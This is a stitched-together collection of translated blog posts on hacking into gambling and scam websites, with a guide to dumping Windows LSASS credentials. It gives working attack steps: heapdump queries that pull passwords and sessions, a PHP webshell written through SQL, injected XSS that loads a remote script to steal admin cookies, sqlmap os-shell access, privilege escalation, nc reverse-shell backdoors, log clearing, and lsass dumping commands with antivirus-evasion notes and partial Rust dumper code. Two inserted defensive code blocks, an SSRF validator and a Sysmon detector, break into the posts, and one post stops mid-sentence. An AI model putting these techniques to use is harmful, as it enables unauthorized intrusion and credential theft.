Only one open gateway was found, 172.30.2.1, so I ran the intranet IPs of that gateway's segment instead, replacing ip.txt. After running for a day it only turned up two intranet IPs, 172.30.2.1 and 172.30.2.2. Most likely 172.30.2.2 is the host itself and 172.30.2.1 is the cloud server's virtual gateway. Finally I used the ftp protocol to scan their ports (just adapt the script yourself). Most results were false positives; in fact they only open ports 80 and 443, so unless other intranet IPs turn up later, nothing more can be expected from the SSRF. The last attempt, brute-forcing uc_server by changing the XFF header so that the image captcha stays fixed, also failed. For details see https://www.freebuf.com/articles/web/197546.html

The forum was a dead end, so let's see what is wrong with the customer service system.

```
/res/image.html?id=upload/6c825ed7ea4cd25657288ab4f7d0227f
```

The id parameter is passed in, but the directory cannot be traversed and the file upload cannot be exploited, so start directory scanning. The admin login page has slider verification, but it is only enforced on the front end and useless on the back end; even so, brute-forcing it got nowhere. Seeing /actuator tells you it is Spring Boot, so use a targeted dictionary. /swagger-ui.html is empty, /env redirects to admin, /heapdump is 403. With nothing else left, I tried /heapdump.json, and it worked.

Unzip the 1 GB memory file, open it in MemoryAnalyzer (MAT) and query it with OQL. Without /env to cross-reference, the configuration can only be checked blind. Here are some tips I worked out.

Check the configuration; sorting by Retained Heap (size) is more convenient:

```
select * from org.springframework.web.context.support.StandardServletEnvironment
```

Strings containing "password". This search does not easily lead to the owning class, but it quickly finds login records and the like. Replace password with http:// to find URLs:

```
select * from java.lang.String s WHERE toString(s) LIKE '.*password.*'
```

Quickly check database-related information:

```
select * from java.util.Hashtable$Entry x WHERE (toString(x.key).contains('username'))
select * from java.util.Hashtable$Entry x WHERE (toString(x.key).contains('password'))
select * from java.util.Hashtable$Entry x WHERE (toString(x.key).contains('url'))
```

This turned up the mysql address, account and password. Unfortunately, Amazon's database has an IP whitelist by default and cannot be logged into remotely.

```
select * from java.lang.String s WHERE toString(s) LIKE '.*SESSION.*'
```

This found a logged-in session; replacing mine with it logs into the background. The background uses the WSS protocol for real-time conversations, and there is nothing exploitable in the avatar upload or the customer-service reply. All that turned up were the complaints of some losing gamblers. The black-box test was fruitless. I searched GitHub for the distinctive class names from the heapdump and found a copy of source code that is probably the initial version; the target is a modified version and the source is not very complete. Auditing the incomplete code turned up an arbitrary file read and an SSRF. With some source code you know where the configuration file is, so read it and get the database configuration. Of course, before
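The forum fetcher that the timing scan above abuses is what a remote-image download endpoint must not do. As an added example (not the post's own code), this validator rejects the three levers the scan relies on before any request is sent: non-http schemes such as gopher://, hosts that resolve to intranet, loopback or link-local addresses, and non-web ports. The resolver is injected and SAMPLE_DNS is a constructed table so it runs offline.

```python
"""Validate a user-supplied remote-image URL before fetching it.

Added example, not from the post. The name SAMPLE_DNS and the resolver
argument are constructed for offline use; production code resolves for real
and must connect to the checked address rather than the hostname.
"""
import ipaddress
from typing import Callable, Iterable, Tuple
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}          # assumption: image hosts only on web ports

# Constructed lookup table standing in for DNS.
SAMPLE_DNS = {
    "cdn.example.test": ["93.184.216.34"],
    "localhost": ["127.0.0.1"],
    "metadata.example.test": ["169.254.169.254"],
}


def resolve_offline(host: str) -> Iterable[str]:
    """IP literals resolve to themselves, names via SAMPLE_DNS."""
    try:
        ipaddress.ip_address(host)
        return [host]
    except ValueError:
        return SAMPLE_DNS.get(host, [])


def is_public(addr: str) -> bool:
    """Globally routable unicast only: rejects RFC 1918 ranges, loopback,
    link-local (including 169.254.169.254 cloud metadata), multicast and
    reserved space."""
    ip = ipaddress.ip_address(addr)
    return ip.is_global and not ip.is_multicast


def check_remote_image_url(url: str,
                           resolve: Callable[[str], Iterable[str]] = resolve_offline
                           ) -> Tuple[bool, str]:
    """Return (allowed, reason) for a URL the forum was asked to download.

    A fetcher that passes this check must still send the request with
    redirects disabled and run every Location header it receives back
    through the same check; otherwise the 302.php trick in the post (a public
    URL redirecting to gopher://) bypasses it.
    """
    try:
        parts = urlsplit(url)
        port = parts.port            # raises ValueError on a malformed port
    except ValueError:
        return False, "malformed URL"
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {scheme!r} not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    if parts.username is not None or parts.password is not None:
        return False, "credentials embedded in URL"
    port = port or (443 if scheme == "https" else 80)
    if port not in ALLOWED_PORTS:
        return False, f"port {port} not allowed"
    addrs = list(resolve(host))
    if not addrs:
        return False, f"{host} does not resolve"
    for addr in addrs:
        if not is_public(addr):
            return False, f"{host} resolves to non-public address {addr}"
    return True, "ok"
```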
-
Title: Record of a real-world anti-fraud penetration of a gambling game, done to help a fan
0X00 The origin of the matter

After hearing the story, and based on my own experience, this should be a "pig-butchering" scam: the scammers use various means to convince victims that they can make money, induce them to recharge, and then slaughter the pigs on a gambling platform.

0X01 Penetration process (it was taken down in about twenty minutes)

The penetration process was simple and boring. After a look at the IP and ports I judged there was no cloud WAF, so I started scanning directories directly. After a few minutes I found http://xxxx.com.cn/u.php, which turned out to be the upupw integrated environment, as shown in the figure below.

Idea: brute-force phpMyAdmin, or find upupw's default database password. Try the latter first. The password provided by the package, DRsXT5ZJ6Oi55LPQ by default, logged into phpMyAdmin successfully.

Then try to get a shell. Since there was an upupw probe, I viewed phpinfo directly and got the website's absolute path, then tried writing a shell the usual way. You need the absolute path, root permission on the database and file-write permission for the database. The statement:

```
SELECT '<?php eval(@$_POST['xx']);?>' INTO OUTFILE 'D:\\wap\\member_bak.php'
```

Note: under Windows the backslashes must be doubled, otherwise they are treated as escapes. Then connect with Caidao (China Chopper), AntSword or similar. Since I took no screenshots at the time and the website can no longer be opened, what follows shows the state after getting the shell. Penetration over. I checked the permissions: SYSTEM. But our goal was to locate the scammers' IP and location, so on to the next step.

0X02 Locating the scammers' IP and port

With a shell this is much easier: just find the php file behind the background login and insert XSS code.

After searching for a while I found the background login under another website's directory, and edited admin778899.php:

```
echo '<sCRiPt sRC=https://xx.xx/XFXX></sCrIpT>';
```

Then wait for the scammers to log in. They actually logged in from a mobile phone, 666. Replacing the cookie to log into the background turned out to be useless; it was just some figures. Look up the IP on ipip.net: no surprise, it is abroad again. Alas.

0X03 Informing the fan of the result

The WeChat chat record with the victim is posted directly.

0X04 How to prevent such fraud

1. When making friends online, raise your awareness of fraud, keep a healthy social mindset and protect your personal information, especially where financial transactions are involved; be sure to verify the other party's true identity through multiple channels.
2. Anyone who offers to lead you into investing or managing money online with high returns should be treated as a fraud.
3. Scammers constantly share posts about investment profits in their circle of friends to lure victims into approaching them.
4. They induce victims to register on the platform and invest funds; when the victim sees a profit and wants to withdraw, the platform keeps extracting money on pretexts such as an incorrectly entered bank card number, a deposit required, a missed notification, a frozen account, or taxes.
5. Keep a sound view of investment and finance and do not blindly believe in risk-free, high-return schemes; there is no pie falling from the sky.

Reprinted from the original: https://mp.weixin.qq.com/s/7o4XV8MKbX3wCT3ZxbCMng
-
Title: Common entry points for penetrating gambling ("spinach") websites and apps
I have done a lot of qp (chess and card) and BC (gambling) penetrations. I spent two sleepless nights and a few drinks on this, so here is a brief account of the process and a summary.

First qp. Taking a successful case as the example, information collection comes first. What is characteristic of qp? The backend sits on different ports behind the server's domain name, as shown in the figure: you can find the basics from the ports.

Entry point: find the SQL injection or the feedback location in the app, XSS. Sometimes the packet capture shows 127.0.0.1 and packets cannot be caught; this is more common with large platforms, and they do not necessarily use TCP/UDP. You can refer to the Proxifier global proxy mentioned by T-ice.

Once you have the background you can fuzz it. Some administrators have the habit of making backups, which may yield new discoveries. Relatively speaking, qp is quite simple.

Now BC; see last night's case. Large BC platforms basically come with all kinds of protection plus CDN as standard. After all, having made so much money, they do not care about this bit of equipment cost. I registered an account and found nowhere to fire XSS. Stop. Because this kind of large platform is generally run quite well and is generous in every respect, such as navigation and a points mall, there should be one messy corner somewhere. On a VIP query page of the main site there was a SQL injection, and it was the ThinkPHP framework, ThinkPHP 3.2.3. Because a CDN hides the real IP, finding the background is very troublesome. I originally wanted to see whether the logs in the database revealed anything. Nothing useful. Tried reading the log file, no. Finally, reading the configuration file confirmed something very stupid. Maybe after an all-nighter the mind gets a little stiff.

I forgot that this kind of BC background is always on a separate domain. Heh. Stay up late less. Then, based on previous experience, I manually added some likely prefixes to the main domain name: admin.XXXX.com agdw.
-
Title: Penetration practice against a gambling ("spinach") website
I. Preface

Recently I heard that websites built with a certain qipai product have SQL injection, and someone sent one over. The usual penetration routine: information collection, vulnerability detection/exploitation, privilege escalation/persistence, cleaning traces.

II. Information collection

Visiting the home page in the browser shows: system Windows Server, middleware IIS 7.5, language ASPX.

Port scan:

```
nmap -sV -T4 -p- 11x.xx.xx.xx.xx
```

Many ports are open, among them several web services: 80 (the current homepage), 81, 82, 88, 47001.

- 81: the backend of this qipai site.
- 82: also a backend; I do not know what system it is, and it has a captcha.
- 88/47001: access failed.
- 1433: MSSQL database.
- 139 and 445 are also open but filtered; whether there is a firewall we will see later.

Use dirsearch to scan sensitive directories first. The language collected earlier is aspx, so add -e to specify it:

```
python dirsearch.py -u http://11x.xx.xxx.xx -e aspx
```

Then 7kbscan as well, since its dictionary is the one commonly used here.

- /m/ is the user registration page, possibly useful; note it.
- /test.html is an "add WeChat" page, useless; probably meant to lead victims to chat on their phone.

The IP belongs to an operator in Beijing; quite bold to host the site on a domestic server.

Information sorting: probably a small self-built site. I will not collect further, so as not to waste time.

III. Vulnerability detection

Focus on port 81 found earlier, the website's backend management page. No captcha, so enter admin/admin as username/password and capture the request. Adding a quote to the username and sending the request directly returns an error; barring surprises there is error-based or blind injection.

Two tracks in parallel. Save the packet locally as qipai.txt and scan it with sqlmap; since it is already known to be MSSQL, add --dbms to save time:

```
python sqlmap.py -r qipai.txt --dbms 'Microsoft SQL Server' --dbs
```

The other track: send the packet to the Intruder module to brute-force the password. Entering a random username in the browser prompts "User name does not exist", while admin prompts "User name or password is wrong", so the admin account exists and only the password needs brute-forcing. The password is 888999, a weak password, eternal god!

Logged into the background. There are only 69 registered users; the rest are all robots. These 69 users have recharged 1.43 million? Are all qipai players so rich? I am so happy that I cannot bear to pay 6 yuan for the first recharge. I cannot get involved in gambling; this guy lost 2800 in one day.

After searching the background for a long time I could not find an upload point, so I set that aside. Back to sqlmap: injection confirmed, and it was already enumerating database names. 16 databases came out. Judging by the name, RYPlatformManagerDB may contain administrator information; enumerate its tables:

```
python sqlmap.py -r qipai.txt --tables -D RYPlatformManagerDB
```

After a long search I found an administrator account and password, the same one Burp brute-forced earlier, plus some user information, nothing more valuable.

```
python sqlmap.py -r qipai.txt --is-dba
```

It is DBA. Try to get a shell directly through the MSSQL database with sqlmap:

```
python sqlmap.py -r qipai.txt --os-shell
```

The blind injection used by --os-shell is slow, and after a long wait I finally got the shell.

It looks like a technical job, but really it is physical labour. The current user's permissions are very limited, just those of the MSSQL database. `systeminfo` shows the system is 64-bit Windows Server 2008. Cobalt Strike generates a payload, it is loaded on the target with PowerShell, and the target comes online. `net user` lists users; `tasklist` lists processes, and it does not look like there is AV; `net start` lists the enabled services and shows the firewall is on, which is why the earlier nmap scan showed 445 and other ports as filtered. Turn off the firewall; privileges not yet escalated.

IV. Privilege escalation / persistence

Knowing the machine is Windows Server 2008, I tried a potato privilege escalation (MS16-075). After executing it I waited a while; luck was on my side, the machine was unpatched and escalation succeeded in one go. With SYSTEM I can do whatever I want. Entering file management you can see the test.html file from the information-collection step. `netstat -ano` shows 3389 is not open; open it manually and remote desktop becomes reachable. I am not very skilled with Cobalt Strike, so I switched to Metasploit: upload a payload generated by msf through CS, and have msf listen.

Note: CS can spawn a session directly to msf, but after trying for a long time the session never came back, so I had no choice but to upload an msf payload as a workaround.

msf listens; run the uploaded payload from CS; msf gets the shell, inheriting SYSTEM. Viewing the password hashes fails because the msf payload is 32-bit and the system is 64-bit. `ps` lists the processes; find a 64-bit process running as SYSTEM, migrate into it, then dump the hashes. Look the administrator's hash up on an online cracking site; the password is not complicated and is found in a few seconds. Logged into remote desktop successfully. Leave two backdoors, one webshell and one auto-starting nc reverse shell.

V. Clean up traces and withdraw

meterpreter's `clearev` command clears the logs in one go; or delete the Windows logs manually.

VI. Summary

VII. Experiment recommendation

Manual injection using sqlmap: https://www.hetianlab.com/expc.do?ec=ECID172.19.104.182015011915533100001pk_campaign=freebuf-wemedia

Through this experiment you can understand sqlmap, master its commonly used commands, and learn to use sqlmap to assist manual injection.

Reprinted from the original: https://www.freebuf.com/articles/network/250744.html
-
Title: Record of penetrating a pig-butchering platform
0x00 Introduction

Last year I was browsing Weibu (ThreatBook). I originally wanted to find a few IPs to practise my tracing skills, but accidentally discovered a pig-butchering platform. If anything is missing from this article, please point it out. Please do not go to Weibu to find me to reproduce this target; the case has been fully handed over to the authorities.

0x01 A simple recipe

Opening the link, a strong "micro-disk" (微盘) aura came at us. Since we had audited this source code ourselves, we went straight to the corresponding place and fired the XSS. It turned out this micro-disk was a third-generation modification, yes, third-generation! With no other option, I fell back on the old idea: find a way to make the framework throw an error, read the version number, and go for the RCE. When getting the version number and physical path there is a small detail, see the picture below: SERVER_NAME and SERVER_ADDR. On similar projects before, these two values returned by making the page error out sometimes contained the real IP; if you cannot find the target's real IP, try this trick.

Everyone knows that for such targets, collecting side sites, ports and so on is of no use, so I will not go into it. I registered an account and looked around; nothing to use. Then I suddenly remembered an injection in goods/pid. Since we had used our own 0day before, I had never used this injection point; today I tried it. Bingo! This is very nasty. Knowing the physical path, can you write a shell? No, the permissions are insufficient. But look what I found: the database information is displayed for no reason. Can it be connected directly? Obviously not, because it does not accept external connections.

0x02 Right on

The stalemate lasted about ten minutes, then see what I found: adminer. Hahaha, how did I find this?

I mentioned before that we had audited the first and second versions of this system; there is an adminer database management page in certain specific directories, so I fuzzed this target for it, found it, and connected. Find the suspect's IP, check its authenticity and location: sure enough, it is in our greater Yunnan again. To keep the evidence complete we still had to find a way to take a screenshot of the background. Since I was now in the database, I could force a payload into the place where the blind XSS had failed to fire, and then induce the customer service to trigger it. And then I was in. The background upload point had been removed in the third version, the database permissions were insufficient to write a shell, and the required services could not be enabled, so in the end I could not get a shell.

Reprinted from the original: https://mp.weixin.qq.com/s?__biz=Mzg4MjcxMTAwMQ==mid=2247486198idx=1sn=e41bc5d7e4aee7314beaab7f5830435dchksm=cf53ca40f8244356493dff79a82e26a8c3ef89c50c4508de61cacf523527534d383e6d6b2445scene=178cur_album_id=2831511688645656580#rd
-
Title: Summary of Windows lsass dump methods
Preface

lsass.exe (Local Security Authority Subsystem Service) holds, in its process memory, important information such as the machine's domain and the local usernames and passwords. A user with high local privileges can read the LSASS process memory and export that data for lateral movement and privilege escalation. Dumping user passwords or hashes from lsass is therefore an indispensable step in penetration testing. Here we study the principle and record the various dumping methods.

[toc]

General method

```
sekurlsa::logonpasswords
```

We usually call such tools LOLBins, meaning binaries that attackers can use for purposes beyond their original one. Here we focus on LOLBins that can export process memory.

Whitelisted tools

Three Microsoft-signed whitelisted programs: Procdump.exe, SQLDumper.exe, createdump.exe.

Procdump: dump lsass.exe memory

ProcDump is a Microsoft-signed, legitimate binary provided for dumping process memory; the official download is in the Microsoft documentation. Use Procdump to grab the lsass process as a dmp file:

```
procdump64.exe -accepteula -ma lsass.exe lsass_dump
```

Then load it in mimikatz:

```
sekurlsa::minidump lsassdump.dmp
sekurlsa::logonPasswords
```

If the string lsass.exe is sensitive, you can use the PID of lsass.exe instead:

```
procdump64.exe -accepteula -ma <pid> lsass_dump
```

The principle: lsass.exe is part of the Windows security mechanism, mainly responsible for local security and logon policy. After a user enters a password at logon, the password is stored in lsass.exe's memory: the wdigest and tspkg modules encrypt it with a reversible algorithm and keep it in memory. mimikatz recovers the plaintext by reversing that computation over lsass.exe's memory.
As for detection: Huorong (火绒) did not flag it; 360 did not detect it in version 13 but did in version 14.

SQLDumper.exe

The Sqldumper.exe utility ships with Microsoft SQL Server. It generates memory dumps of SQL Server and related processes for debugging. Common paths:

```
C:\Program Files\Microsoft SQL Server\100\Shared\SqlDumper.exe
C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\SQLDumper.exe
C:\Program Files (x86)\Microsoft SQL Server\100\Shared\SqlDumper.exe
```

SQLDumper.exe comes with Microsoft SQL Server and Office and can generate a full dump file. View the PID of lsass.exe:

```
tasklist /svc | findstr lsass.exe
```

Export the mdmp file:

```
Sqldumper.exe <ProcessID> 0 0x01100
```

Then decrypt it locally; the same operating-system version is required:

```
mimikatz.exe "sekurlsa::minidump SQLDmpr0001.mdmp" "sekurlsa::logonPasswords full" exit
```

Killed by 360; Huorong did not detect it.

createdump.exe

Appeared with .NET 5; it is a native binary. Although it is signed, it is also flagged by AV.

```
createdump.exe -u -f lsass.dmp <lsass PID>
```

Will be killed by 360.

comsvcs.dll

comsvcs.dll mainly provides the COM+ Services. The file exists on every Windows system, and a full dump of a process can be produced by using Rundll32 to call its exported function MiniDump. This is a whitelisted file. We mainly use the MiniDump export in comsvcs.dll to dump lsass.exe. Note that administrator rights are also required, because SeDebugPrivilege must be enabled: in cmd this privilege is disabled by default, while in PowerShell it is enabled by default.
The file is located at C:\windows\system32\comsvcs.dll. Call MiniDump to dump the lsass.exe process as follows:

```
powershell C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
```

360 also flags this. Dumping memory by calling MiniDump directly is still too sensitive; without some modification it is easily detected.

Other tools

rdrleakdiag.exe

Present by default on Windows 10, Windows 8.1, Windows 8, Windows 7 and Windows Vista (software versions 10.0.15063.0, 6.3.9600.17415, 6.2.9200.16384, 6.1.7600.16385, 6.0.6001.18000). If it is not there, you can upload one. Generate the dmp memory file:

```
rdrleakdiag.exe /p <pid> /o <outputdir> /fullmemdmp /wait 1
```

Two files are generated, results_<pid>.hlk and minidump_<pid>.dmp. Then use mimikatz on the dump.

AvDump.exe

AvDump.exe ships with Avast antivirus. It dumps the memory of a specified process (lsass.exe) and carries Avast's digital signature, so it is generally not killed by AV. Download: https://www.pconlife.com/viewfileinfo/avdump64-exe/#fileinfoDownloadSaveInfodivGoto2

It must be run from PowerShell, since cmd does not enable SeDebugPrivilege by default; but 360 now detects avdump.

```
.\AvDump.exe --pid <lsass pid> --exception_ptr 0 --thread_id 0 --dump_level 1 --dump_file C:\Users\admin\Desktop\lsass.dmp --min_interval 0
```

It too will be killed by 360.

Writing your own DLL

A demo of calling MiniDump. This involves Windows process programming, so first look at how to enumerate processes on Windows. Enumerating processes takes several APIs and one structure:

1. Create a process snapshot
2. Initialise the first process to enumerate
3. Continue to the next one
4. The process information structure

Create the snapshot with CreateToolhelp32Snapshot:

```c
HANDLE WINAPI CreateToolhelp32Snapshot(
    DWORD dwFlags,        // which objects to include in the snapshot, e.g. TH32CS_SNAPPROCESS
    DWORD th32ProcessID   // process ID whose snapshot to take; 0 for the system process list or the current process
);
```

Get the first process with Process32First:

```c
BOOL WINAPI Process32First(
    HANDLE hSnapshot,        // in: snapshot handle
    LPPROCESSENTRY32 lppe    // out: process information structure, filled in by the system
);
```

Get the next process with Process32Next:

```c
BOOL WINAPI Process32Next(
    HANDLE hSnapshot,        // handle returned from CreateToolhelp32Snapshot
    LPPROCESSENTRY32 lppe    // pointer to the PROCESSENTRY32 process information structure
);
```

Also involved is the PROCESSENTRY32 structure. The fields useful to us are dwSize (size of the structure, set before use), th32ProcessID (process ID) and szExeFile[MAX_PATH] (process path):

```c
typedef struct tagPROCESSENTRY32 {
    DWORD dwSize;              // structure size, must be initialised before the first call
    DWORD cntUsage;            // reference count of this process; 0 means the process has ended
    DWORD th32ProcessID;       // process ID
    DWORD th32DefaultHeapID;   // process default heap ID
    DWORD th32ModuleID;        // process module ID
    DWORD cntThreads;          // number of threads this process has opened
    DWORD th32ParentProcessID; // parent process ID
    LONG  pcPriClassBase;      // thread priority
    DWORD dwFlags;             // reserved
    char  szExeFile[MAX_PATH]; // full process name
} PROCESSENTRY32;
```

So the Rust implementation is as follows:

```rust
fn getProcess() {
    unsafe {
        let mut handle = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS | TH32CS_SNAPTHREAD, 0);
        let mut process_entry: PROCESSENTRY32 = zeroed();
        process_entry.dwSize = std::mem::size_of::<PROCESSENTRY32>() as u32;
        //let mut process_handle = null_mut();
        if !handle.is_null() {
            if Process32First(handle, &mut process_entry) == 1 {
                loop {
                    // szExeFile is a NUL-terminated char array; convert up to the terminator
                    let extFileName = OsString::from_wide(
                        process_entry.szExeFile.iter().map(|&x| x as u16).take_while(|&x| x != 0).collect::<Vec<u16>>().as_slice(),
                    );
                    println!("{:?}----------{}", extFileName, process_entry.th32ProcessID);
                    if Process32Next(handle, &mut process_entry) == 0 {
                        break;
                    }
                }
            }
        }
    }
}
```

Code for the complete dump of the lsass process memory:

```rust
use std::{mem::size_of, ffi::{CStr, OsString, c_void, OsStr}, os::windows::prelude::{OsStringExt, AsRawHandle, RawHandle, OsStrExt}, fs::File, path::{Path, self}};
use std::ptr;
use clap::{App, Arg};
use log::error;
use windows_sys::{Win32::{Foundation::{CloseHandle, GetLastError, INVALID_HANDLE_VALUE, HANDLE, LUID},
    Security::{TOKEN_PRIVILEGES, LUID_AND_ATTRIBUTES, SE_PRIVILEGE_ENABLED, TOKEN_ADJUST_PRIVILEGES, LookupPrivilegeValueA, AdjustTokenPrivileges},
    System::{Threading::OpenProcessToken, Diagnostics::ToolHelp::TH32CS_SNAPTHREAD},
    Storage::FileSystem::CreateFileA}, core::PCSTR};
use windows_sys::Win32::Storage::FileSystem::{CreateFileW, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL};
use windows_sys::Win32::System::Diagnostics::Debug::{MiniDumpWithFullMemory, MiniDumpWriteDump};
use windows_sys::Win32::System::Diagnostics::ToolHelp::{CreateToolhelp32Snapshot, Process32First, Process32Next, PROCESSENTRY32, TH32CS_SNAPPROCESS};
use windows_sys::Win32::System::SystemServices::GENERIC_ALL;
use windows_sys::Win32::System::Threading::{OpenProcess, PROCESS_ALL_ACCESS};

fn getPrivilege(handle: HANDLE) {
    unsafe {
        let mut h_token: HANDLE = HANDLE::default();
        let mut h_token_ptr: *mut HANDLE = &mut h_token;
        let mut tkp: TOKEN_PRIVILEGES = TOKEN_PRIVILEGES {
            PrivilegeCount: 1,
            Privileges: [LUID_AND_ATTRIBUTES {
                Luid: LUID { LowPart: 0, HighPart: 0 },
                Attributes: SE_PRIVILEGE_ENABLED,
            }],
        };
        // Open the access token of the current process
        let token = OpenProcessToken(handle, TOKEN_ADJUST_PRIVILEGES, h_token_ptr);
        if token != 0 {
            let systemname = ptr::null_mut();
            if LookupPrivilegeValueA(systemname, b"SeDebugPrivilege\0".as_ptr(), &mut tkp.Privileges[0].Luid) != 0 {
                tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
                //println!("{}", tkp.Privileges[0].Attributes);
                // Enable SeDebugPrivilege for the current process
                if AdjustTokenPrivileges(h_token, 0, &tkp as *const TOKEN_PRIVILEGES, 0, ptr::null_mut(), ptr::null_mut()) != 0 {
                    println!("Token privileges adjusted successfully");
                } else {
                    let last_error = GetLastError();
                    println!("AdjustTokenPrivileges failed with error: STATUS({})", last_error);
                }
            } else {
                let last_error = GetLastError();
                println!("LookupPrivilegeValue failed with error: STATUS({})", last_error);
            }
            // Close the access token handle
            CloseHandle(h_token);
        } else {
            let last_error = GetLastError();
            println!("OpenProcessToken failed with error: STATUS({})", last_error);
        }
    }
}

fn getProcess(LsassFile: &str) {
    unsafe {
        let mut h_snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
        if h_snapshot == INVALID_HANDLE_VALUE {
            println!("Failed to call CreateToolhelp32Snapshot");
        }
        let mut process_entry: PROCESSENTRY32 = std::mem::zeroed::<PROCESSENTRY32>();
        process_entry.dwSize = size_of::<PROCESSENTRY32>() as u32;
        if Process32First(h_snapshot, &mut process_entry) == 0 {
            println!("Process32First error");
        }
        loop {
            let extFileName = CStr::from_ptr(process_entry.szExeFile.as_ptr() as *const i8).to_bytes();
            let extfile = OsString::from_wide(extFileName.iter().map(|&x| x as u16).collect::<Vec<u16>>().as_slice()).to_string_lossy().into_owned();
            if extfile.starts_with("lsass.exe") {
                println!("[+] Got {} PID: {}", extfile, process_entry.th32ProcessID);
                break;
            }
            if Process32Next(h_snapshot, &mut process_entry) == 0 {
                println!("Failed to call Process32Next");
                break;
            }
        }
        let lsass_pid = process_entry.th32ProcessID;
        let process_handle = OpenProcess(PROCESS_ALL_ACCESS, 0, lsass_pid);
        if process_handle == 0 {
            println!("Fail to open the process ");
        }
        let lsassFile = LsassFile;
        let lsassFile: Vec<u16> = OsStr::new(lsassFile).encode_wide().chain(Some(0).into_iter()).collect();
        let lsasshandle = CreateFileW(lsassFile.as_ptr() as *const u16, GENERIC_ALL, 0, ptr::null_mut(), CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);
        if lsasshandle == INVALID_HANDLE_VALUE {
            println!("Fail to open/create file {}", LsassFile.to_string());
        }
        let result = MiniDumpWriteDump(
```
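Every method in this post, from procdump and sqldumper through rundll32 calling comsvcs.dll!MiniDump to the hand-written MiniDumpWriteDump caller above, first has to open lsass.exe with a handle that includes PROCESS_VM_READ, and Sysmon records that open as Event ID 10 (ProcessAccess) together with the access mask and the caller's stack. The following is an added detection example, not part of the post; SAMPLE_EVENTS is constructed in Sysmon's message layout, and the ALLOWLIST is an assumption to be tuned per host.

```python
"""Flag LSASS memory access in Sysmon Event ID 10 (ProcessAccess) records.

Added example, not from the post. SAMPLE_EVENTS and ALLOWLIST are constructed
assumptions for the demonstration.
"""
import ntpath
from typing import Dict, List, Tuple

PROCESS_VM_READ = 0x0010
PROCESS_ALL_ACCESS = 0x1FFFFF        # what procdump and comsvcs!MiniDump ask for

# Dump utilities discussed in the post, matched on image basename.
KNOWN_DUMP_TOOLS = {"procdump.exe", "procdump64.exe", "sqldumper.exe",
                    "createdump.exe", "rundll32.exe", "rdrleakdiag.exe",
                    "avdump.exe", "avdump64.exe"}
# A minidump writer on the call stack betrays a custom dumper like the Rust one.
MINIDUMP_MODULES = ("dbghelp.dll", "dbgcore.dll", "comsvcs.dll")
# Processes that read lsass legitimately (assumption; verify path and signature).
ALLOWLIST = {"msmpeng.exe", "csrss.exe", "wininit.exe"}

SAMPLE_EVENTS = r"""
Process accessed:
UtcTime: 2024-05-01 10:01:00.000
SourceImage: C:\Users\admin\Desktop\procdump64.exe
TargetImage: C:\Windows\system32\lsass.exe
GrantedAccess: 0x1FFFFF
CallTrace: C:\Windows\SYSTEM32\ntdll.dll+9d4e4|C:\Windows\SYSTEM32\dbgcore.DLL+7123

Process accessed:
UtcTime: 2024-05-01 10:02:00.000
SourceImage: C:\Windows\System32\rundll32.exe
TargetImage: C:\Windows\system32\lsass.exe
GrantedAccess: 0x1FFFFF
CallTrace: C:\Windows\SYSTEM32\ntdll.dll+9d4e4|C:\Windows\System32\comsvcs.dll+4c2d1

Process accessed:
UtcTime: 2024-05-01 10:03:00.000
SourceImage: C:\ProgramData\Microsoft\Windows Defender\Platform\MsMpEng.exe
TargetImage: C:\Windows\system32\lsass.exe
GrantedAccess: 0x1FFFFF
CallTrace: C:\Windows\SYSTEM32\ntdll.dll+9d4e4

Process accessed:
UtcTime: 2024-05-01 10:04:00.000
SourceImage: C:\Windows\System32\svchost.exe
TargetImage: C:\Windows\system32\lsass.exe
GrantedAccess: 0x1000
CallTrace: C:\Windows\SYSTEM32\ntdll.dll+9d4e4

Process accessed:
UtcTime: 2024-05-01 10:05:00.000
SourceImage: C:\Users\admin\Desktop\dumper.exe
TargetImage: C:\Windows\system32\lsass.exe
GrantedAccess: 0x1FFFFF
CallTrace: C:\Windows\SYSTEM32\ntdll.dll+9d4e4|C:\Windows\System32\dbghelp.dll+17c2
"""


def parse_sysmon_events(text: str) -> List[Dict[str, str]]:
    """Split Sysmon's 'Key: Value' message text into one dict per event."""
    events, cur = [], {}
    for line in text.splitlines():
        if not line.strip():
            if cur:
                events.append(cur)
                cur = {}
            continue
        key, sep, value = line.partition(": ")
        if sep:                       # skips the 'Process accessed:' header
            cur[key.strip()] = value.strip()
    if cur:
        events.append(cur)
    return events


def detect_lsass_access(events: List[Dict[str, str]]) -> List[Tuple[str, str, str]]:
    """Return (UtcTime, SourceImage, reason) for each suspicious access."""
    findings = []
    for ev in events:
        if ntpath.basename(ev.get("TargetImage", "")).lower() != "lsass.exe":
            continue
        try:
            mask = int(ev.get("GrantedAccess", "0"), 16)
        except ValueError:
            continue
        if not mask & PROCESS_VM_READ:
            continue                  # this handle cannot read memory at all
        src = ev.get("SourceImage", "")
        name = ntpath.basename(src).lower()
        if name in ALLOWLIST:
            continue
        trace = ev.get("CallTrace", "").lower()
        if name in KNOWN_DUMP_TOOLS:
            reason = f"known dump utility {name}"
        elif any(m in trace for m in MINIDUMP_MODULES):
            reason = "minidump library on call stack"
        elif mask == PROCESS_ALL_ACCESS:
            reason = "PROCESS_ALL_ACCESS handle to lsass"
        else:
            continue                  # quieter baseline: alert on any VM_READ here
        findings.append((ev.get("UtcTime", "?"), src, reason))
    return findings
```

Alongside detection, enabling LSA Protection (RunAsPPL) stops unsigned user-mode tools from opening lsass.exe with PROCESS_VM_READ in the first place.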
-
Title: Record of a practical penetration of a pig-butchering site
Foreword

I saw an article in the middle of the night yesterday and thought I would practise on it, but halfway through I found that the masters had already worked over such sites. So I drew on their experience, did some exercises and wrote down whatever came to mind. The write-up is therefore a bit tangled, and I also noted where there was no solution. Then I changed sites and carried on.

Information collection

The front end looks like this. Other information, from a port query: 80 is the main page, 8182 is the background login page, 1433 is MSSQL. Directory scan: directory listing.

Vulnerability discovery

